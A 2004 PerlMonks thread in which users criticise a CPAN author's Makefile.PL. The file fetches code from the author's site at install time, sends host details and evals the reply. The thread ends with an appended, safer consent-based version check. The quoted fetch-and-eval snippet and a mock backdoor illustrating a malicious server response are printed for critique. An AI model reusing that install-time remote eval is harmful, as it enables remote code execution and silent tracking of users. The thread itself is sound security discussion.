Re: Re: CGI::Application vs CGI::Builder

by tantarbobus (Hermit)
on May 03, 2004 at 03:09 UTC


in reply to Re: CGI::Application vs CGI::Builder
in thread CGI::Application vs CGI::Builder

Perrin, maybe the style is not evil, but what Makefile.PL does is quite Evil:

    eval {
        require LWP::Simple;
        my $res = LWP::Simple::get(
            "http://perl.4pro.net/install.txt"
            . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O"
        );
        eval $res if $res;
    }
I am assuming that this is just a benign install counter, and maybe it has the ability to alert the user that the version being installed has been updated, but how do I know that there is not something like this at perl.4pro.net?

    if (grep /$user_domain/, @my_enemies) {
        open(FH, '<', 'backdoor.txt');
        print while (<FH>);
        print STDERR "$user_host 0wn3d! hehehe\a\a\a\a\a\a\a\n";
    } else {
        open(FH, '<', 'message.txt');
        print while (<FH>);
        print STDERR "Tick\n";
    }
    close FH;

And even if there is no code like that: 1. It is still underhanded! And 2. What happens if perl.4pro.net gets owned? Then someone could install code that does the above. Bonus points for doing it as a kernel module!

Would it not be ironic were his site to be compromised by another module's "Counter feature"?

And look at perl.4pro.net: it shows quite a few Perl modules, and I would wager that most of them have the same code in the Makefile.PL.


Re: Re: Re: CGI::Application vs CGI::Builder
by Anonymous Monk on May 03, 2004 at 07:22 UTC
    > I am assuming that this is just a benign install
    > counter and maybe it has the ability to alert the user
    > that the version being installed has been updated

    It's exactly that ;-). Just try to install an old version and you will have a prompt telling you that you are installing an old version, and for the counter... knowing how many people find my work useful is one of the reasons that make me publish my modules ;-)

    > It is still underhanded!

    Well, if you go through some old versions of my modules, the Makefile.PL had a prompt. After receiving a lot of users' complaints I took off the prompt. No secret backdoor. The effort and time that writing modules like CGI::Builder and related documentation require is a little bit TOO MUCH to be wasted on similar stupid hacks.

    > What happens if perl.4pro.net gets owned, then someone could install code that does the above.

    This is a really GOOD question, and I didn't think about that before your post!!! Thank you very much! Even if it is a very remote possibility, it's real. I think that a possible solution may be adding an expiration date in the code in the Makefile.PL, thus if it runs after that date, it just warns the user of the probably old version and does nothing with perl.4pro.net.

    Any other suggestion?

    Domizio Demichelis

      > It's exactly that ;-). Just try to install an old version and you will have a prompt telling you that you are installing an old version

      If they're installing automatically from CPAN they'll get the latest CPAN version automatically.

      If they're deliberately requesting an older version then they're doing it deliberately and don't want the warning.

      If your site has a more up-to-date version than the one on CPAN, surely it's your job to get the latest version uploaded to PAUSE ;-)

      In any case this doesn't need you to execute arbitrary code - you just need to fetch the version number and do a comparison.

      > and for the counter... knowing how many people find useful my work is one of the reasons that make me publish my modules ;-)

      If you really have to have a counter then a simple HTTP GET will do the job (it can be the GET you use to get the current version if you really want to do the version checking twice).

      A count of module usage produced in this way will, of course, be wildly inaccurate since there are lots of installs that have nothing to do with actual usage (CPAN testers, people who are curious but never use, etc.)

      > Well, if you go through some old version of my modules, the Makefile.PL had a prompt. After receiving a lot of users' complaint i take off the prompt. No secret backdoor.

      Just because people didn't like the warning doesn't mean it shouldn't have been there. I for one would be extremely annoyed if a CPAN module was downloading and executing code that I didn't see first. Especially since in this instance there is no need to download and execute arbitrary code. From the other reactions here many people seem to share that opinion.

      > The effort and time that require writing modules like CGI::Builder and related documentation is a little bit TOO MUCH to be wasted in similar stupid hacks.

      Unfortunately there is a large body of evidence that nasty people are willing to expend foolishly large amounts of time and effort in producing exploits.

      Note: I am not trying to imply that you are such a nasty person. As a human being I try to be all nice and fluffy and trust people until they do something to demonstrate that I can't trust them. I like living my life that way.

      However, as a computing professional I can't trust something that runs arbitrary code on my or my clients' machines. With your system look at who I have to trust (in addition to CPAN):

      • I have to trust that the code that is downloaded is actually okay and I have to go through another step to download and inspect it.
      • I have to trust that you are not an evil person who is deliberately trying to exploit my machine. You might be doing really evil things like only putting the exploit in every 8th download so a simple check on what's downloaded isn't enough.
      • I have to trust that somebody has not cracked your box and is feeding us an exploit without your knowledge.
      • I have to trust everything between my box and your box is not pretending to be your box and feeding me an exploit.
      • etc.

      > I think that a possible solution may be adding an expiration date in the code in the Makefile.PL, thus if it runs after that date, it just warn the user of the probably old version and does nothing with perl.4pro.net.

      This only reduces the window of opportunity. It does not remove it.

      > Any other suggestion?

      1. Just don't do it at all. Let CPAN handle your versioning problems. Get your feedback from users via e-mail, cpanratings, etc. Learn not to worry about the number of times your code is installed since it doesn't really mean much.
      2. If you really cannot cope without some meaningless numbers do not download and execute arbitrary code. You don't need to do so if all you want to do is check a version number or get a count of the number of times Makefile.PL is run.
      3. Ask the user before starting any network connections off your own back.

        I perfectly agree with you, but please, consider this:

        There is no problem with CPAN version handling; the problem is that there are a lot of old installations coming from ActiveState. I really hate to see that someone could run some old version that may have some bug which is already fixed in the new version. (hubris?)

        > Learn not to worry about the number of times your code is installed
        > since it doesn't really mean much.

        Well, I am not a native English speaker, and writing the documentation takes me really A LOT of time, so knowing that my efforts are useful to someone really helps me, even if the numbers are "wildly inaccurate". Nobody likes to do something possibly useless!

        > Unfortunately there is a large body of evidence that nasty people are
        > willing to expend foolishly large amounts of time and effort in producing exploits.

        That's true, but who could be so stupid as to do bad things using their own name and their own registered domain? Anyway, I hope that my quick fix can solve that problem.

        Thank you for your feedback. I will take it into consideration.

        dd

Re: Re: Re: CGI::Application vs CGI::Builder
by Anonymous Monk on May 03, 2004 at 19:32 UTC

    Even better: Since I have no need to send something to eval from my domain, I will put all the code to execute in the Makefile.PL avoiding any "insane suspect".

    I need just to check the version number, so I think that something like this could be ok:

    my $dist = 'CGI::Builder';
    my $vers = 1.21;
    my $LWP_installed = eval { require LWP::Simple };
    if ($LWP_installed) {
        my $current_vers = LWP::Simple::get(
            "http://perl.4pro.net/check_version.cgi"
            . "?DISTRIBUTION=$dist&VERSION=$vers&PERL=$]-$^O"
        );
        if ($current_vers > $vers) {
            print 'This is an OLD VERSION! ... bla, bla';
        } else {
            print 'Version OK ... bla, bla';
        }
    }

    If there are no objections, I will change all my Makefile.PL files to that code in the next version.
    (I will update all my new distributions in a day or so).

    Regards

    Domizio Demichelis

      One slight problem - if you have a system that cannot talk directly to the outside world, then your Makefile assumes that the version is OK. The code doesn't fail, it just makes an assumption (proper or improper) that no news is good news.

      --MidLifeXis

      Domizio:

      The problem is that you do NOT have any right to know that I installed your module from the CPAN, and it IS an invasion of my privacy for you to grab my IP address. When I intentionally go to your web site with my browser, it is a given that I am choosing to have you record who I am. Here, you are doing it without my permission or knowledge. You are capturing data about me against my will, which is a de facto breach of my privacy.

      There's no two ways about it.

      Your idea is not bad, but is done incorrectly. The whole thing would be solved if you asked permission before fetching it. I know that is a burden, but tough. You do not have the right to collect my data without my permission, explicit or otherwise.

        Thank you for your feedback. I wrote a post about this matter that may be of interest to you: http://www.xray.mpe.mpg.de/mailing-lists/modules/2004-05/msg00211.html

        Regards

        Domizio
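The replies in this thread ask for three things: fetch a version string rather than code to eval, ask the user before opening any network connection, and do not treat a failed fetch as a good answer. As an added example, not code from the thread or from the CGI::Builder distribution, here is a Makefile.PL check written that way. The check_version.cgi URL is reused from the proposal above; that it answers with a bare version string such as "1.22" is an assumption for illustration, and the sub name check_version and its status strings are mine.

```perl
#!/usr/bin/perl
# Added example (not code from the thread or from CGI::Builder): a Makefile.PL
# version check done the way the replies ask for it.
#   - asks before any network access (default No, so unattended installs stay offline)
#   - fetches only a version string, never code to eval
#   - validates the response before comparing it
#   - treats a failed fetch as "unknown", not as "version OK"
# Assumed: the endpoint answers with a plain dotted version such as "1.22\n".
use strict;
use warnings;
use ExtUtils::MakeMaker;   # provides prompt(), which honours PERL_MM_USE_DEFAULT and non-tty input
use version;

my $dist = 'CGI::Builder';
my $vers = '1.21';

# Returns one of: skipped, unreachable, malformed, outdated, current.
sub check_version {
    my ($dist, $vers, $url) = @_;

    # Network access only with explicit consent; the default answer is No.
    my $answer = prompt(
        "May Makefile.PL contact $url to see whether $dist $vers is current? (y/N)", 'N');
    return 'skipped' unless $answer =~ /^y/i;

    # A missing LWP::Simple and a failed GET both end up as undef here.
    my $body = eval {
        require LWP::Simple;
        LWP::Simple::get($url);
    };
    return 'unreachable' unless defined $body;

    # Accept nothing but a dotted version number: an HTML error page, a proxy
    # login screen or text planted on a compromised server is rejected outright.
    my ($remote) = $body =~ /\A\s*v?(\d+(?:\.\d+)*)\s*\z/;
    return 'malformed' unless defined $remote;

    return version->parse($remote) > version->parse($vers) ? 'outdated' : 'current';
}

# Only the distribution name is sent; no Perl version, OS or other host details.
my $url    = "http://perl.4pro.net/check_version.cgi?DISTRIBUTION=$dist";   # assumed endpoint
my $status = check_version($dist, $vers, $url);

my %message = (
    skipped     => "Version check skipped; see CPAN for the latest $dist release.\n",
    unreachable => "Could not reach $url (offline, proxy or server problem); version NOT verified.\n",
    malformed   => "Unexpected reply from $url; ignoring it, version NOT verified.\n",
    outdated    => "A newer $dist than $vers is available; consider upgrading before installing.\n",
    current     => "$dist $vers is the current release.\n",
);
if ($status eq 'current') { print $message{$status} }
else                      { warn  $message{$status} }

WriteMakefile(NAME => $dist, VERSION => $vers);
```

Two design points worth noting against the proposal above: an undefined result from LWP::Simple::get is reported as "NOT verified" instead of falling through to "Version OK", which is the no-news-is-good-news problem MidLifeXis describes, and the server still sees the installer's IP address on every contact, which is exactly why the prompt defaults to No and has to be answered before anything is sent.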
